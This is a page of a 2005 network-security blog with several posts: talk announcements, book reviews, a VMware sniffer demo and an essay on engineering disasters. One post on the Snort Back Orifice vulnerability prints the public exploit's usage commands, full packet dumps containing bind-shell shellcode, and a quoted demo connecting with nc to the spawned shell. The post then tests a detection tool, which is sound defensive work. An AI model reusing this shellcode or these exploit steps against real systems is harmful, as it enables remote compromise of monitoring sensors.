Monday, October 31, 2005

Bejtlich to Speak at ShmooCon 2006

I just learned I will speak at ShmooCon 2006 in Washington, DC on Saturday, 14 January 2006 at 1600. The subject is Network Security Monitoring with Sguil.

Friday, October 28, 2005

First Hampton Roads, VA Snort Users Group Meeting

My friend David Bianco is organizing a Hampton Roads, VA Snort Users Group. The first meeting will be 1 December 2005. Check out the story for more details!

FreeBSD 6.0-RELEASE Available Soon

According to this announcement by FreeBSD release engineer Scott Long, FreeBSD 6.0-RELEASE "will likely be announced by the end of the weekend or early next week, at the latest." This is great news. I plan to upgrade all of my 5.4 systems to 6.0 when it is available. I'll post my experiences.

Thursday, October 27, 2005

New (IN)SECURE Magazine Features Bejtlich Article

The latest (IN)SECURE magazine was just published. Issue 1.4 features a 7-page article on Structured Traffic Analysis, a methodology to investigate network traces I developed for my Network Security Operations class.

It uses open source tools to perform zero-knowledge analysis of saved traffic. After reading this article, you may share the sentiments of a student in one of my recent classes who said "I’m embarrassed I ever used Ethereal to start network analysis!"

Review of VMware Workstation 5 Handbook Posted

Amazon.com just posted my four star review of VMware Workstation 5 Handbook. From the review:

"Steven S. Warren's VMware Workstation 5 Handbook (VW5H) is a great book for beginning and intermediate VMware Workstation (WS) users. It is well-written, thorough, and informative. Those who are trying to deploy WS for average home, research, or corporate purposes will find their needs met. Those looking for in-depth coverage exceeding VMware's online documentation will be disappointed. Still, I've been using VMware for almost 4 years, and I learned a few new tricks.

VMware's online documentation is excellent. Those seeking to install and operate WS will find most of their needs met reading VMware's free guides. VW5H provides context and problem-solving techniques that one may not acquire from VMware's documentation. For example, a new user may be unaware of the purpose of a product like VMware P2V Assistant. By reading Ch 15 of VW5H, the user will learn how P2V can create virtual machines out of physical systems."

VMware Workstation Vnetsniffer

Did you know VMware Workstation ships with a sniffer? I should have know about it before now. Lenny Zeltser mentioned it in his 2001 paper on reverse engineering malware. There's only 15 references in Google Groups, however.

Vnetsniffer is very limited with regard to reporting. Here is sample output:

C:\Program Files\VMware\VMware Workstation>vnetsniffer
usage: vnetsniffer [/e] (/p "pvnID" | VMnet?)

C:\Program Files\VMware\VMware Workstation>runas /u:administrator "vnetsniffer /e vmnet0"
Enter password for administrator:
Attempting to start "vnetsniffer /e vmnet0" as user "administrator"...

len 203 src 00:03:47:0f:1f:3c dst 00:13:10:65:2f:ab IP src 192.168.2.4
dst 208.185.174.52 TCP
len 60 src 00:13:10:65:2f:ab dst 00:03:47:0f:1f:3c ARP sender
00:13:10:65:2f:ab 192.168.2.1 target 00:00:00:00:00:00 192.168.2.4
ARP request
len 42 src 00:03:47:0f:1f:3c dst 00:13:10:65:2f:ab ARP sender
00:03:47:0f:1f:3c 192.168.2.4 target 00:13:10:65:2f:ab 192.168.2.1
ARP reply
len 203 src 00:03:47:0f:1f:3c dst 00:13:10:65:2f:ab IP src 192.168.2.4
dst 208.185.174.52 TCP
len 342 src 00:0c:29:22:b7:2d dst ff:ff:ff:ff:ff:ff IP src 0.0.0.0
dst 255.255.255.255 UDP
len 203 src 00:03:47:0f:1f:3c dst 00:13:10:65:2f:ab IP src 192.168.2.4
dst 208.185.174.52 TCP
len 342 src 00:0c:29:22:b7:2d dst ff:ff:ff:ff:ff:ff IP src 0.0.0.0
dst 255.255.255.255 UDP
len 342 src 00:0c:29:22:b7:2d dst ff:ff:ff:ff:ff:ff IP src 0.0.0.0
dst 255.255.255.255 UDP
len 203 src 00:03:47:0f:1f:3c dst 00:13:10:65:2f:ab IP src 192.168.2.4
dst 208.185.174.52 TCP
len 435 src 00:13:10:65:2f:ab dst 00:03:47:0f:1f:3c IP src 208.185.174.52
dst 192.168.2.4 TCP

This output doesn't even show TCP or UDP ports, which would be very helpful. Vnetsniffer seems best suited for basic troubleshooting of virtual switches, thanks to the ability to specify a vmnet to monitor. Here I chose vmnet0, which is the default bridged interface. vmnet1 is used for host-only networking, and vmnet8 is used for NAT.

Wednesday, October 26, 2005

Bejtlich Books in HNS Contest

Mirko Zorz from Help Net Security notified me that two of my books are up for grabs in the HNS 7th Anniversary Book Contest. You could win Real Digital Forensics or Extrusion Detection: Security Monitoring for Internal Intrusions. The winners will be announced on Monday, 5 December 2005. Good luck!

Tuesday, October 25, 2005

Snort BO Exploit Published

As I expected, FrSIRT published an exploit for the Snort Back Orifice vulnerability discovered last week. I was able to compile and execute this code by RD of THC.org on FreeBSD 5.4.

orr:/home/richard$ ./THCsnortbo 66.93.110.10 1
Snort BackOrifice PING exploit (version 0.3)
by rd@thc.org

Selected target:
1 | manual testing gcc with -O0

Sending exploit to 66.93.110.10
Done.
orr:/home/richard$ ./THCsnortbo 66.93.110.10 2
Snort BackOrifice PING exploit (version 0.3)
by rd@thc.org

Selected target:
2 | manual testing gcc with -O2

Sending exploit to 66.93.110.10
Done.

Here is what the traffic looks like:

09:30:36.134739 IP 192.168.2.5.56292 > 66.93.110.10.53: 52835 updateD ServFail [5863q][|domain]
0x0000: 4500 0594 0bdb 0000 4011 f669 c0a8 0205 E.......@..i....
0x0010: 425d 6e0a dbe4 0035 0580 9592 ce63 d1d2 B]n....5.....c..
0x0020: 16e7 13cf d45a 5a79 4d8a b466 aaa2 c875 .....ZZyM..f...u
0x0030: 2309 78b2 e0d4 ef49 8a8e 39e5 aa8a 4d0d #.x....I..9...M.
0x0040: 22b5 3751 6ec9 9763 29e3 8469 f317 7430 ".7Qn..c)..i..t0
0x0050: f162 20c3 d501 a47b c0a0 c559 a5d5 96b2 .b.....{...Y....
0x0060: b04f fc0b 6749 d086 70c3 e65b 93f2 8c0a .O..gI..p..[....
0x0070: 0197 140f 95ce 3598 3a88 2fb3 cdbb ae2b ......5.:./....+
0x0080: 0458 7135 0f1e 8b06 be6d 2aa8 84bd 56ec .Xq5.....m*...V.
0x0090: da50 3ca1 a785 0b46 be2e bf3c a9a5 dd80 .P<....F...<....
0x00a0: 855a de98 ed70 cf8c 3cc9 b7f7 8ddf 3b7d .Z...p..<.....;}
0x00b0: 0595 ffbf f38d 4e6d 769b 7c1c c159 6a58 ......Nmv.|..YjX
0x00c0: 3b5c 6a7b 8aa8 43df f0c0 9710 36a0 0306 ;\j{..C.....6...
0x00d0: e92e 8752 824e a6b6 4a75 d07a bdc1 9e1c ...R.N..Ju.z....
0x00e0: ce27 bee7 6c6c d148 c458 303d a7a8 d68e .'..ll.H.X0=....
0x00f0: 6e43 7a81 5a50 fb69 81a6 e17e c6a3 c293 nCz.ZP.i...~....
0x0100: a7e1 a244 3d06 ffce 003a ac84 c95f 1bbf ...D=....:..._..
0x0110: bcbc a1d5 86bb d48d 0374 5852 c349 1b46 .........tXR.I.F
0x0120: ad73 deb9 25fc b51a 8a4f b14d 03cd bbfe .s..%....O.M....
0x0130: 9c22 a315 eb17 1bab f848 1d1b 3c39 143c .".......H..<9.<
0x0140: e965 5a0e 0a78 bd94 6cde 07a1 feda 7f15 .eZ..x..l.......
0x0150: 35db aa6a 13ac 966a 096b 98e4 7a9d 94be 5..j...j.k..z...
0x0160: 6100 7dcd 76e0 dee3 ae4e 78a8 e16e 0c8c a.}.v....Nx..n..
0x0170: 6f70 1c5b 2522 ee93 bca4 1132 04fc 4294 op.[%".....2..B.
0x0180: 3f0a 901b b0fe dfef 76e9 ca89 b472 6d4a ?.......v....rmJ
0x0190: b3ca e2b1 09c1 2a6d bcfa afd0 a2bd 2745 ......*m......'E
0x01a0: 2b6d dbc3 41d9 6941 6e96 a76d 9fcc 49f8 +m..A.iAn..m..I.
0x01b0: 880f a4b4 2812 1401 0e17 1be4 dc2a ebd9 ....(........*..
0x01c0: 8b0f 864b 10f9 8481 1dfc 559b 2b45 67fd ...K......U.+Eg.
0x01d0: 7609 8a6b 093b 32f7 1ce2 3df6 fbea 7699 v..k.;2...=...v.
0x01e0: 49fa 39db 25a6 f877 0c05 ddfc 3f26 b002 I.9.%..w....?&..
0x01f0: 06be fc5f 55a6 4db6 6d83 7dd0 8645 2f2d ..._U.M.m.}..E/-
0x0200: 6dd4 db5c 6988 2c69 a2f8 86d7 e3f5 8cef m..\i.,i........
0x0210: bfd8 e157 5219 6de6 6ac2 02b7 46a3 409d ...WR.m.j...F.@.
0x0220: 1d87 d616 42e7 4962 c75d fa55 00dc 234b ....B.Ib.].U..#K
0x0230: 295e e29c 8a9e 5a91 1a87 76d5 a26c 4f0f )^....Z...v..lO.
0x0240: 035a 7030 5b2b 18e8 833c 1f9e 1d41 3ddf .Zp0[+...<...A=.
0x0250: ad38 2755 c4bb 9cfc 25da bf52 2208 258e .8'U....%..R".%.
0x0260: 86d5 f2d2 f9dc 1fa3 ff7d 5ed9 62ce 4112 .........}^.b.A.
0x0270: 512e 188b 69da 1af2 1343 2656 4ee0 8aa0 Q...i....C&VN...
0x0280: 8fe0 8406 a602 265d e2e9 ff0e d8ca 788d ......&]......x.
0x0290: c068 bda6 0042 9d19 6d0a 53e8 af7a 46ed .h...B..m.S..zF.
0x02a0: 25a3 ad51 2966 577b b5a6 2aa6 85bd 2a57 %..Q)fW{..*...*W
0x02b0: 7fae 7dad 31bb cd19 ba18 0e90 ccff 203e ..}.1..........>
0x02c0: 70e6 b67e ea4e 18a8 1e9d 67a9 74ae 9fb9 p..~.N....g.t...
0x02d0: 38e8 82c9 252c d29b 8313 1e17 2df8 e1fb 8...%,......-...
0x02e0: 38b1 88d3 9223 53c9 2776 fd5f aa67 3f7a 8....#S.'v._.g?z
0x02f0: 121e 7221 c37f 1427 2ee4 4ca5 7bab 71cb ..r!...'..L.{.q.
0x0300: 868c c978 484e ae69 383a f58e 312f f223 ...xHN.i8:..1/.#
0x0310: 16f8 36fe 93bb 7aa4 a5d4 41a1 fdc2 58b7 ..6...z...A...X.
0x0320: a1df a196 1455 522e f8af b7c1 306e 7fbc .....UR.....0n..
0x0330: 2a7e 3527 dd49 adbb 1049 2334 5b83 7ee7 *~5'.I...I#4[.~.
0x0340: 9232 7a55 1f42 86c0 6e1f 6b1e 508d 8f6c .2zU.B..n.k.P..l
0x0350: b899 b925 2acf d5d3 358d 5a25 1e78 8b61 ...%*...5.Z%.x.a
0x0360: 1f6e 5bdc 10fc 94c8 e511 b96d 1712 2a5c .n[........m..*
0x0370: 480f e81f 41b6 5ab5 3e67 f01d ada8 86d0 H...A.Z.>g......
0x0380: 72d9 8b54 4f6a c2ee 426c 6858 ef06 18d3 r..TOj..BlhX....
0x0390: 4009 4bfe 8a06 04e8 32de 2bc3 f0fa 389a @.K.....2.+...8.
0x03a0: 93fd b3c4 a576 59f9 8f7a 2284 a051 c09a .....vY..z"..Q..
0x03b0: 8a70 0aea 8e87 fa75 1a9c b4a0 1078 0968 .p.....u.....x.h
0x03c0: 68c0 bbb5 9807 a152 f4a2 0d9c b1fc 4c58 h......R......LX
0x03d0: 2ecb 6d4a f482 8684 fd88 73dc b489 2121 ..mJ......s...!!
0x03e0: 5b4c eacf 73e5 c2a0 372c 9145 4a6d 62b6 [L..s...7,.EJmb.
0x03f0: 5261 dc27 e57d ce3c c3ca d05e 44f5 274e Ra.'.}.<...^D.'N
0x0400: 1467 cab9 db78 63cc 62e0 b80a 734e cb5c .g...xc.b...sN.
0x0410: a01c 5ea8 4782 9bc6 d52a 134e 88a4 e5b6 ..^.G....*.N....
0x0420: b91b 813b 5ac8 4e7d dca6 c911 55e5 4ff1 ...;Z.N}....U.O.
0x0430: 9f83 5c16 8477 7529 d9b0 6336 e9aa 8210 ..\..wu)..c6....
0x0440: d5ef 789e 77bd 491c 2e92 e890 16bc d51e ..x.w.I.........
0x0450: f8fd 1e58 2446 23ee fa37 8841 3e90 9090 ...X$F#..7.A>...
0x0460: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0470: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0480: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0490: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04a0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04b0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04c0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04d0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04e0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04f0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0500: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0510: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0520: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0530: 9090 9090 9090 9090 9090 9090 9090 31db ..............1.
0x0540: 5343 536a 026a 6658 9989 e1cd 8096 4352 SCSj.jfX......CR
0x0550: 6668 7a69 6653 89e1 6a66 5850 5156 89e1 fhzifS..jfXPQV..
0x0560: cd80 b066 d1e3 cd80 5252 5643 89e1 b066 ...f....RRVC...f
0x0570: cd80 936a 0259 b03f cd80 4979 f9b0 0b52 ...j.Y.?..Iy...R
0x0580: 682f 2f73 6868 2f62 696e 89e3 5253 89e1 h//shh/bin..RS..
0x0590: cd80 0000 ....
09:30:49.654205 IP 192.168.2.5.55465 > 66.93.110.10.53: 52835 updateD ServFail [5863q][|domain]
0x0000: 4500 0594 0be4 0000 4011 f660 c0a8 0205 E.......@..`....
0x0010: 425d 6e0a d8a9 0035 0580 8ec2 ce63 d1d2 B]n....5.....c..
0x0020: 16e7 13cf 1fa1 a586 4d8a b466 aaa2 c875 ........M..f...u
0x0030: 2309 78b2 e0d4 ef49 8a8e 39e5 aa8a 4d0d #.x....I..9...M.
0x0040: 22b5 3751 6ec9 9763 29e3 8469 f317 7430 ".7Qn..c)..i..t0
0x0050: f162 20c3 d501 a47b c0a0 c559 a5d5 96b2 .b.....{...Y....
0x0060: b04f fc0b 6749 d086 70c3 e65b 93f2 8c0a .O..gI..p..[....
0x0070: 0197 140f 95ce 3598 3a88 2fb3 cdbb ae2b ......5.:./....+
0x0080: 0458 7135 0f1e 8b06 be6d 2aa8 84bd 56ec .Xq5.....m*...V.
0x0090: da50 3ca1 a785 0b46 be2e bf3c a9a5 dd80 .P<....F...<....
0x00a0: 855a de98 ed70 cf8c 3cc9 b7f7 8ddf 3b7d .Z...p..<.....;}
0x00b0: 0595 ffbf f38d 4e6d 769b 7c1c c159 6a58 ......Nmv.|..YjX
0x00c0: 3b5c 6a7b 8aa8 43df f0c0 9710 36a0 0306 ;\j{..C.....6...
0x00d0: e92e 8752 824e a6b6 4a75 d07a bdc1 9e1c ...R.N..Ju.z....
0x00e0: ce27 bee7 6c6c d148 c458 303d a7a8 d68e .'..ll.H.X0=....
0x00f0: 6e43 7a81 5a50 fb69 81a6 e17e c6a3 c293 nCz.ZP.i...~....
0x0100: a7e1 a244 3d06 ffce 003a ac84 c95f 1bbf ...D=....:..._..
0x0110: bcbc a1d5 86bb d48d 0374 5852 c349 1b46 .........tXR.I.F
0x0120: ad73 deb9 25fc b51a 8a4f b14d 03cd bbfe .s..%....O.M....
0x0130: 9c22 a315 eb17 1bab f848 1d1b 3c39 143c .".......H..<9.<
0x0140: e965 5a0e 0a78 bd94 6cde 07a1 feda 7f15 .eZ..x..l.......
0x0150: 35db aa6a 13ac 966a 096b 98e4 7a9d 94be 5..j...j.k..z...
0x0160: 6100 7dcd 76e0 dee3 ae4e 78a8 e16e 0c8c a.}.v....Nx..n..
0x0170: 6f70 1c5b 2522 ee93 bca4 1132 04fc 4294 op.[%".....2..B.
0x0180: 3f0a 901b b0fe dfef 76e9 ca89 b472 6d4a ?.......v....rmJ
0x0190: b3ca e2b1 09c1 2a6d bcfa afd0 a2bd 2745 ......*m......'E
0x01a0: 2b6d dbc3 41d9 6941 6e96 a76d 9fcc 49f8 +m..A.iAn..m..I.
0x01b0: 880f a4b4 2812 1401 0e17 1be4 dc2a ebd9 ....(........*..
0x01c0: 8b0f 864b 10f9 8481 1dfc 559b 2b45 67fd ...K......U.+Eg.
0x01d0: 7609 8a6b 093b 32f7 1ce2 3df6 fbea 7699 v..k.;2...=...v.
0x01e0: 49fa 39db 25a6 f877 0c05 ddfc 3f26 b002 I.9.%..w....?&..
0x01f0: 06be fc5f 55a6 4db6 6d83 7dd0 8645 2f2d ..._U.M.m.}..E/-
0x0200: 6dd4 db5c 6988 2c69 a2f8 86d7 e3f5 8cef m..\i.,i........
0x0210: bfd8 e157 5219 6de6 6ac2 02b7 46a3 409d ...WR.m.j...F.@.
0x0220: 1d87 d616 42e7 4962 c75d fa55 00dc 234b ....B.Ib.].U..#K
0x0230: 295e e29c 8a9e 5a91 1a87 76d5 a26c 4f0f )^....Z...v..lO.
0x0240: 035a 7030 5b2b 18e8 833c 1f9e 1d41 3ddf .Zp0[+...<...A=.
0x0250: ad38 2755 c4bb 9cfc 25da bf52 2208 258e .8'U....%..R".%.
0x0260: 86d5 f2d2 f9dc 1fa3 ff7d 5ed9 62ce 4112 .........}^.b.A.
0x0270: 512e 188b 69da 1af2 1343 2656 4ee0 8aa0 Q...i....C&VN...
0x0280: 8fe0 8406 a602 265d e2e9 ff0e d8ca 788d ......&]......x.
0x0290: c068 bda6 0042 9d19 6d0a 53e8 af7a 46ed .h...B..m.S..zF.
0x02a0: 25a3 ad51 2966 577b b5a6 2aa6 85bd 2a57 %..Q)fW{..*...*W
0x02b0: 7fae 7dad 31bb cd19 ba18 0e90 ccff 203e ..}.1..........>
0x02c0: 70e6 b67e ea4e 18a8 1e9d 67a9 74ae 9fb9 p..~.N....g.t...
0x02d0: 38e8 82c9 252c d29b 8313 1e17 2df8 e1fb 8...%,......-...
0x02e0: 38b1 88d3 9223 53c9 2776 fd5f aa67 3f7a 8....#S.'v._.g?z
0x02f0: 121e 7221 c37f 1427 2ee4 4ca5 7bab 71cb ..r!...'..L.{.q.
0x0300: 868c c978 484e ae69 383a f58e 312f f223 ...xHN.i8:..1/.#
0x0310: 16f8 36fe 93bb 7aa4 a5d4 41a1 fdc2 58b7 ..6...z...A...X.
0x0320: a1df a196 1455 522e f8af b7c1 306e 7fbc .....UR.....0n..
0x0330: 2a7e 3527 dd49 adbb 1049 2334 5b83 7ee7 *~5'.I...I#4[.~.
0x0340: 9232 7a55 1f42 86c0 6e1f 6b1e 508d 8f6c .2zU.B..n.k.P..l
0x0350: b899 b925 2acf d5d3 358d 5a25 1e78 8b61 ...%*...5.Z%.x.a
0x0360: 1f6e 5bdc 10fc 94c8 e511 b96d 1712 2a5c .n[........m..*
0x0370: 480f e81f 41b6 5ab5 3e67 f01d ada8 86d0 H...A.Z.>g......
0x0380: 72d9 8b54 4f6a c2ee 426c 6858 ef06 18d3 r..TOj..BlhX....
0x0390: 4009 4bfe 8a06 04e8 32de 2bc3 f0fa 389a @.K.....2.+...8.
0x03a0: 93fd b3c4 a576 59f9 8f7a 2284 a051 c09a .....vY..z"..Q..
0x03b0: 8a70 0aea 8e87 fa75 1a9c b4a0 1078 0968 .p.....u.....x.h
0x03c0: 68c0 bbb5 9807 a152 f4a2 0d9c b1fc 4c58 h......R......LX
0x03d0: 2ecb 6d4a f482 8684 fd88 73dc b489 2121 ..mJ......s...!!
0x03e0: 5b4c eacf 73e5 c2a0 372c 9145 4a6d 62b6 [L..s...7,.EJmb.
0x03f0: 5261 dc27 e57d ce3c c3ca d05e 44f5 274e Ra.'.}.<...^D.'N
0x0400: 1467 cab9 db78 63cc 62e0 b80a 734e cb5c .g...xc.b...sN.
0x0410: a01c 5ea8 4782 9bc6 d52a 134e 88a4 e5b6 ..^.G....*.N....
0x0420: b91b 813b 5a1c edcf 5da6 c911 55e5 4ff1 ...;Z...]...U.O.
0x0430: 9f77 ffa4 0577 7529 d9b0 6336 e97e 21a2 .w...wu)..c6.~!.
0x0440: 54ef 789e 77bd 491c 2ef1 71b6 0f90 9090 T.x.w.I...q.....
0x0450: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0460: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0470: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0480: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0490: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04a0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04b0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04c0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04d0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04e0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04f0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0500: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0510: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0520: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0530: 9090 9090 9090 9090 9090 9090 9090 31db ..............1.
0x0540: 5343 536a 026a 6658 9989 e1cd 8096 4352 SCSj.jfX......CR
0x0550: 6668 7a69 6653 89e1 6a66 5850 5156 89e1 fhzifS..jfXPQV..
0x0560: cd80 b066 d1e3 cd80 5252 5643 89e1 b066 ...f....RRVC...f
0x0570: cd80 936a 0259 b03f cd80 4979 f9b0 0b52 ...j.Y.?..Iy...R
0x0580: 682f 2f73 6868 2f62 696e 89e3 5253 89e1 h//shh/bin..RS..
0x0590: cd80 0000 ....

I ran this traffic by a local sensor running Snort 2.3.3 on FreeBSD 5.4 and it continued to function. There was no DoS or exploit. RD's exploit as written targets Linux. His demo exploits a 2.6 kernel:

* $ ./snortbo 192.168.0.101 1
* Snort BackOrifice PING exploit (version 0.3)
* by rd@thc.org
*
* Selected target:
* 1 | manual testing gcc with -O0
*
* Sending exploit to 192.168.0.101
* Done.
*
* $ nc 192.168.0.101 31337
* id
* uid=104(snort) gid=409(snort) groups=409(snort)
* uname -sr
* Linux 2.6.11-hardened-r1

Kyle Haugsness wrote a tool and rules to detect the Snort BO exploit which you might find useful. By following the directions in the code I got it to work on FreeBSD 5.4:

orr:/home/richard$ gcc -Wall -lpcap -o ident-snort-bo-exploit ident-snort-bo-exploit.c
orr:/home/richard$ sudo ./ident-snort-bo-exploit
# Using interface: fxp0
# Using alert output file: stdout
# Using pcap output file: snort-bo-exploit-2005-10-25-09:46:54.cap
#
##############################################
#
# Detected exploit attempt! (details below)
# Note that shellcode should start after 9th
# byte into the payload below (the 8 byte
# magic value has been removed and the
# remainder of the header is 9 bytes).
#
##############################################
#
# Date/time: Tue Oct 25 09:47:21 2005
# Source IP: 192.168.2.5
# Dest IP: 66.93.110.10
# Source port: 64544
# Dest port: 53
# UDP data len: 1400
# BO key (dec): 31337
# BO key (hex): 0x7A69
# BO data len: -18 (UDP len - 17 byte BO header)
# BO pkt id: -1
# BO pkt type: 0x01 (0x01 = PING)
#
# Decrypted BO data:
#
0x0000: FF FF FF FF FF FF FF FF 01 90 90 90 90 90 90 90 ................
0x0010: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0x0020: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
...edited...
0x0550: 3D AA E7 D7 80 CA 0F 07 36 14 2A 0C 65 08 05 8C =.......6.*.e...
0x0560: EE 97 25 0C 0F 90 66 06 2B 5B E2 3C CE E9 14 4B ..%...f.+[.<...K
0x0570: 00 00 00 00 00 00 00 00 ........
#
# Decoded packet num: 1; Exploit: yes; Timestamp: Tue Oct 25 09:47:21 2005

On a related note, I saw Tom Ptacek comment on my earlier post. Tom says:

"There is nothing wrong with looking for vulnerabilities in your competitor's products, and Neel Mehta has built enough of a rep for himself that he doesn't need to take 'marching orders' from anybody."

I agree there is nothing wrong with looking for vulnerabilities in your competitor's products. However, are we supposed to believe that Neel Mehta, an ISS X-Force researcher, developed this exploit on his own? Are we supposed to think he did not do this at the direction of his employer, who published an advisory? If Neel discovered this vulnerability on his own, and not while working for ISS, why did Sourcefire learn of the vulnerability from US-CERT and not Neel himself?

Monday, October 24, 2005

Reviews of Computer Security 20 Things Every Employee Should Know, 2nd Ed, The Symantec Guide to Home Internet Security Posted

The drought has ended. Amazon.com just posted my two newest reviews. First was Computer Security 20 Things Every Employee Should Know, 2nd Ed by Ben Rothke. I gave it three stars, but I would give the next edition higher ratings if Ben addresses my suggestions. From the review:

Ben Rothke's Computer Security: 20 Things Every Employee Should Know, 2nd Ed, contains a great deal of sound advice for nontechnical employees. At least 10 tips could be eliminated by combining redundancies. I would reduce the list to the following topics:

(1) Beware malware, spyware, and phishing; (2) Protect your identity; (3) Protect the organization's data; (4) Choose sound passwords and protect them; (5) Use organization resources for authorized purposes; (6) Beware of social engineers; (7) Call the experts when things go wrong; (8) Protect laptops, PDAs, cell phones, and other mobile devices as you would corporate resources.

I also reviewed The Symantec Guide to Home Internet Security by Andrew Conry-Murray and Vincent Weafer. I gave this book four stars. From the review:

The Symantec Guide to Home Internet Security (TSGTHIS) is Symantec's latest offering in its new series of books published through Addison-Wesley. This is a very solid introductory desktop security book for home power users. This is not the book to give to your grandmother, unless she likes to tweak Windows or wants to understand differences between file infector and polymorphic viruses. With one caveat, I liked this book...

The book suffers one major flaw that robbed a star from my rating. The single most important defensive measure a home user can take is to not perform daily operations as a user with administrative privileges. Home users should not browse the Web, read email, chat in IM, write documents, or do much anything else using an admin account. Users should only assume admin level power when they need to install software or authorized Active X controls. This single defensive measure is not mentioned by TSGTHIS, but it has protected numerous customers and my family from thousands of client-side attacks.

More on Engineering Disasters and Bird Flu

Here's another anecdote from the Engineering Disasters story I wrote about recently. In 1956 the cruise ship Andrea Doria was struck and sunk by the ocean liner Stockholm. At that time radar was still a fairly new innovation on sea vessels. Ship bridges were dimly lit, and the controls on radar systems were not illuminated. It is possible that the Stockholm radar operators misinterpreted the readings on their equipment, believing the Andrea Doria was 12 miles away when it was really 2 miles away. The ships literally turned towards one another on a collision course, based on faulty interpretation of radar contact in the dense fog. Catastrophe ensued.

This disaster shows how humans can never be removed from the equation, and they are often at center stage when failures occur. The commentator on the show said a 10 cent ligh bulb illuminating the radar controls station could have shown the radar range was positioned in a setting different from that assumed by the operator. Following the Andrea Doria collision, illumintation was added to ship radar controls. This story reminded me that the latest security technology is worthless -- or even worse, damaging -- in the hands of people who are not trained or able to use it properly.

On a different subject, I heard an interview on NPR with Health and Human Services Secretary Mike Leavitt about bird flu. He likened the situation to "surveillance" of a dry forest during fire season. He said that the best defense was vigilance and rapid response. His analogy assumed being nearby when a small fire erupts. First responders who are quickly on the scene can stamp out a fire before it becomes uncontrollable. If the response team is unaware of the fire, it can spread and then be beyond containment. He concluded the interview saying "ultimately, another pandemic will come. Right now we are not prepared."

I thought his comments applied well to digital security incidents. NSM is surveillance, and incident response helps stamp out fires (or bird flu outbreaks) quickly before they exceed an organization's capacity to deal with them. Is your organization ready? If you want to know, TaoSecurity provides services like incident response training and CSIRT assessments and evaluations.

Pre-Review Postscript

I neglected to mention a book I look forward to reading -- Essential SNMP, 2nd Ed by Douglas Mauro and Kevin Schmidt. Most of the technologies I deploy and use are passive monitoring systems. This book represents an active monitoring system, where SNMP is used to determine the status of network resources. I expect Wolfgang Barth's book on Nagios to also be helpful.

Since mentioning the new Apress MySQL book yesterday, MySQL 5 is achieved general availability status with version 5.0.15. I expect the FreeBSD port will be updated shortly.

Bejtlich Speaking at RSA Conference 2006

My proposal to speak at the RSA Conference 2006 was accepted out of 1500+ submissions. I will present in San Jose, CA on Tuesday, 14 February 2006 from 1735 to 1825. The subject is Traffic-Centric Incident Response and Forensics.

Sunday, October 23, 2005

Latest Book Pre-Reviews



During the last two months my work for TaoSecurity has kept me too busy to read and review books. I am trying to get back on track. Here are pre-reviews for books I have received over the last several weeks. First are two books I intend to keep as reference, but which I don't plan to read cover-to-cover. Hence, I won't review them for Amazon.com.

First is Cisco IOS in a Nutshell, 2nd Ed by James Boney. I put this book next to my copy of O'Reilly's UNIX in a Nutshell, 3rd Ed. This book looks like an excellent reference for Cisco admins and anyone pursuing an advanced Cisco certification (beyond the CCNA). I may read the first 350 pages, as the chapters in that half of the book each address a topic of interest, like IP routing or QoS. The last half of the book is a command syntax reference.

Windows Server 2003 Network Administration by Craig Hunt and Roberta Bragg is sitting in my reference section next to O'Reilly's Learning Windows Server 2003 and Windows Server Cookbook. The book appears to be a comprehensive overview of networking services from a Microsoft perspective. Next I turn to books I plan to read and review.

Beginning Python by Magnus Lie Hetland is an update of his 2002 book Practical Python. I originally tried to learn Python by reading Learning Python, 2nd Ed in early 2004, but I bailed on that book after a few chapters. I am really excited to try again with Magnus' book. I consider it to be the gateway to a series of other excellent Apress Python books like Dive Into Python and Foundations of Python Network Programming, which I plan to read. (I hope O'Reilly's Python Cookbook, 2nd Ed will be a good addition to this trio.) I plan to read this book as part of my programming education, which will start once I clear the books which follow.

Ben Rothke sent me a copy of his updated book Computer Security 20 Things Every Employee Should Know, 2nd Ed. This is a booklet that would be appropriate as part of digital security awareness campaign in a company of any size. After skimming through it, the advice seems sound and I would have no problem recommending the book to clients.

The Symantec Guide to Home Internet Security by Andrew Conry-Murray and Vincent Weafer is Symantec's latest foray into the security publishing world. This is a fairly short book, which makes sense given the level of interest and expertise of the intended audience. I would be pleased with it if I could imagine sending it to my parents -- maybe with a copy of FreeBSD? (Probably not!)

VMware Workstation 5 Handbook by Steven S. Warren is a new book from Charles River Media. I had this book on my Amazon.com Wish List for months before I bought a copy at a local Borders. A few days later the publisher shipped me one! They must have read my wish list. This book looks like a thorough and easy-to-read overview of Workstation features. With the introduction of Teams, Snapshots, Clones, and other advances over the 3.x and 4.x lines, I look forward to learning how to make the best use of VMware in my classes and in testing scenarios.

I have not abandoned plans for a TaoSecurity Podcast. I hope two books can give me advice on how best to proceed. The first I plan to read is Todd Cochrane's Podcasting: A Do-It-Yourself Guide, published by Wiley. This was one of the first podcasting books to appear that got reasonable Amazon.com reviews. I hope to gain some insights on how best to create podcasts using minimal equipment.

